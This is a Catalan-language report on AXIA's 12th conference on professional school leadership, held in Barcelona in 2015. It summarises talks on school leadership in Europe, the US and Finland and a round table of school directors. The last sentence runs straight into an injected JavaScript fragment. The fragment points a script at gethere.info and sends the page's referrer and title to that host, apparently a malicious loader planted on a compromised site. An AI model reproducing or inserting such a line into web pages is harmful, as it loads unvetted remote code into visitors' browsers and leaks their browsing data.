XII JORNADA : Ara és l’hora de la direcció professional

L’esperit de nou de la Jornada d’AXIA ha estat visualitzar que la via de la professionalització no sols és possible ara mateix, sinó que és realment valuosa. La Jornada, a més, és una prova de la voluntat de les persones en exercici de la direcció escolar de fer-se visibles, de compartir reptes professionals i de participar en el cercle de la millora contínua que és la formació.

Presentació de la jornada

 Programa Axia XII Jornada 2015

La XII Jornada d’AXIA referma la necessitat de confirmar la direcció professional

Més de 120 persones han assistit a la XII Jornada d’AXIA, “Ara és l’hora de la direcció professional”, celebrada a Barcelona el 26 de novembre. En la inauguració, va ser-hi present la consellera d’Ensenyament, Irene Rigau, que va dir que la direcció de centres guia la transformació. Segons la consellera, estem en un moment crucial per crear el convenciment majoritari d’aquesta transformació.

La primera ponència va ser de Clive Byrne, president d’ESHA, sobre “La direcció professional a Europa”. Hi va exposar les línies estratègiques d’ESHA i va dissertar sobre les competències directives i la construcció dels líders escolars. Va assegurar que millorar la direcció escolar és un objectiu clau de l’OCDE.

El periodista Antoni Bassas va fer un conjunt de reflexions sobre el món escolar a partir d’experiències personals als EUA, un món competitiu on s’individualitza molt l’alumnat per fomentar la responsabilitat individual de créixer i saber-se comunicar. Sobre els directors, va assegurar que han de facilitar el desenvolupament professional i trobar talent en el personal.

Tiina Mäkelä, de la Universitat de Jyväskylä, a Finlàndia, va parlar sobre “La contribució dels directors en la fermesa de la qualitat del sistema educatiu finlandès”. Primer va fer un resum sumari del sistema educatiu finlandès i després va explicar com se seleccionen, es formen i actuen els directors a Finlàndia.

La taula rodona “Experiències de lideratge en la direcció escolar: organitzatiu, pedagògic i de gestió” va permetre sentir experiències de lideratge que han explorat els límits:
Rosa de la Fuente, directora de l’Escola Espai 3 de Sant Joan Despí, va explicar com es pot engegar una renovació metodològica. A partir d’un grup impulsor han creat una cultura d’innovació i de pertinença, amb indicadors per avaluar-ne l’eficàcia.
Josep Lluís, director de l’Institut Baix Camp de Reus, va explicar que han corregit un centre conglomerat d’etapes, sense un ordre comú, per passar a tenir un sentit compartit. Han constatat que l’ordre genera implicació, i que crear coses noves i útils manté el to professional.
Roser Busquets, directora de la ZER Alt Lluçanès, va confessar que la formació a l’EAPC li va proporcionar la seguretat per crear, via NOFC, un projecte comú de tota la zona.
Pere Romero, director del CFA del Clot de Barcelona, va explicar com va trobar un alt grau de paràlisi i de desvinculació dels usuaris en aquests centres i com va engegar un projecte nou amb l’acció tutorial i l‘emprenedoria personal en el nucli.

La cloenda de la jornada va anar a càrrec de Chema Castiella, gerent de l’IMEB, que va reconèixer el gran valor de la responsabilitat pública, que ha d’afrontar molts obstacles i que per això cal que se’n reconegui més explícitament la tasca.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;